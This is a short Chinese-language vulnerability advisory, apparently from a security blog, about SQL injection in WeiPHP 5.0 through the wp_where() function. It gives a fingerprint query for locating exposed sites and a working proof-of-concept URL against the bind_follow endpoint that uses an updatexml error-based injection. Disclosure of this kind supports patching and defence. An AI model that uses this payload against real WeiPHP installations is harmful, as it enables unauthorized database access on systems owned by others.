WeiPHP5.0 bind_follow SQL注入漏洞

漏洞描述

Weiphp5.0 所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响,前台后台均存在注入。

漏洞影响

Weiphp5.0

网络测绘

app=”WeiPHP”

漏洞复现

登陆页面

20231031160746994-443b3e67-5975-43b9-b3f1-0ed26f57b422 (1)

验证POC

/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容